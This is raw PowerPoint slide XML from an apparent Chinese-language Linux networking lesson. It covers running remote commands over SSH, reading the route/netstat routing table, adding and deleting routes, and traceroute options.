            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>root@www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> ~]# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>student@127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/shutdown -h 3 'system will shutdown in 3 minutes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>student@localhost's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> password: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>此時你會發現怎麼畫面卡住了？這是因為上頭的指令所造成經登入遠端主機，但是執行的指令尚未跑完，所以會在等待中。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>那如何指定系統自己跑呢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>? (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>請看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>下個範例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)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4584960" y="2142360"/>
              <a:ext cx="1894680" cy="460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569120" y="2078640"/>
                <a:ext cx="19263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7406640" y="2135880"/>
              <a:ext cx="56880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390800" y="2072160"/>
                <a:ext cx="6004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3906000" y="3030480"/>
              <a:ext cx="3573000" cy="33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889800" y="2967120"/>
                <a:ext cx="36050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4402080" y="2847600"/>
              <a:ext cx="300960" cy="2944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386240" y="2784240"/>
                <a:ext cx="332640" cy="42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0637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遠端連線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SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>操作範例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>範例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與上方範例類似，讓對方主機自己跑指令，你立刻回到近端主機繼續工作： </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>root@www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> ~]# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> -f student@127.0.0.1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/shutdown -h 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>'system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>will shutdown in 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>minutes'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>此時你會立刻登出 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>127.0.0.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，但 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>shutdown </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指令會自己在遠端伺服器跑喔！</a:t>
            </a:r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5277600" y="2109600"/>
              <a:ext cx="718560" cy="133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61400" y="2046240"/>
                <a:ext cx="7506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7008120" y="2142360"/>
              <a:ext cx="758160" cy="33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992280" y="2078640"/>
                <a:ext cx="7898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925440" y="3024000"/>
              <a:ext cx="3547080" cy="52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909600" y="2960640"/>
                <a:ext cx="357876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574280" y="3389760"/>
              <a:ext cx="2462400" cy="525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558080" y="3326400"/>
                <a:ext cx="249444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580760" y="3611880"/>
              <a:ext cx="163980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564920" y="3548520"/>
                <a:ext cx="16714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853440" y="3344040"/>
              <a:ext cx="4533480" cy="52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837600" y="3280680"/>
                <a:ext cx="4565160" cy="17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8199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549901"/>
          </a:xfrm>
        </p:spPr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/>
              <a:t>觀察用選項</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：不要使用通訊協定或主機名稱，直接使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>port number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：使用更詳細的資訊來</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>顯示</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>資訊顯示路由，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Destination(network ID), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Genmask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mask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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Gateway </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>從哪裡連出去、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>0.0.0.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 表示直接由本機傳出，預設閘道則會有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>顯示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>FLAG:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>U (route is up)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：該路由是啟動</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>G (use gateway)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：需要透過外部的主機 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(gateway) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>來轉遞封</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>包。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>Iface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：這個路由傳遞封包的介面。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>內建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>路由順序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>小網域 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(192.168.1.0/24 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Class C)→</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>大網域 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(169.254.0.0/16 Class B) →</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>預設路由 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(0.0.0.0/0.0.0.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>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352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549901"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以下方為例，若有要傳封包到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Google DNS(8.8.8.8)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，主機怎麼判斷路由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>確認是否為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>192.168.1.0/24</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>→</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>確認是否</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>169.254.0.0/16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>→(3)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>都不是則使用預設路由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>0/0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，從</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>192.168.1.254</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>出去。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3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/>
          <a:srcRect t="4974"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043608" y="3789040"/>
            <a:ext cx="7427168" cy="1250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44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 smtClean="0"/>
              <a:t>增加 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(add) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與刪除 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(del) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>路由的相關參數：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>表示後面接的路由為一個網域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Host:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>表示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>後面接的為連接到單部主機的路由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/>
              <a:t>：與網域有關，可以設定 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>netmask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>決定網域的大小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gw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>gateway </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的簡寫，後續接的是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的數值喔，與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>dev </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>不同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dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>如果只是要指定由那一塊網路卡連線出去，則使用這個設定，後面接 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>eth0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>等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716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smtClean="0"/>
              <a:t>route</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>增加 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(add) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與刪除 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(del) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>路由的相關參數：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>表示後面接的路由為一個網域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Host:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>表示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>後面接的為連接到單部主機的路由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netmask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：與網域有關，可以設定 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>netmask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>決定網域的大小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gw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>gateway </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的簡寫，後續接的是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的數值喔，與 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>dev </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>不同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dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>如果只是要指定由那一塊網路卡連線出去，則使用這個設定，後面接 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>eth0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>等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01440" y="1560960"/>
              <a:ext cx="85608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600" y="1497600"/>
                <a:ext cx="887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338840" y="2129400"/>
              <a:ext cx="1920600" cy="918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23000" y="2065680"/>
                <a:ext cx="195228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481200" y="2148840"/>
              <a:ext cx="1319760" cy="52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465360" y="2085480"/>
                <a:ext cx="1351440" cy="17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7452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指令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549901"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>路由的新增與刪除範例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6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/>
          <a:srcRect t="4974"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="689189" y="1821620"/>
            <a:ext cx="6964758" cy="1172482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412" y="2996952"/>
            <a:ext cx="6851104" cy="3750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439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路由相關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334001"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Traceroute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 兩</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>主機間各節點分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>選項</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>與參數：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：進行主機名稱解析，單純用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，速度較快！</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-U </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>port:33434</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>進行偵測</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>預設偵測協定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>ICMP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的方式來進行偵測；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-T </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>來進行偵測，一般使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>port:80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>測試</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：若對方主機在幾秒鐘內沒有回聲就</a:t>
            </a:r>
            <a:r>
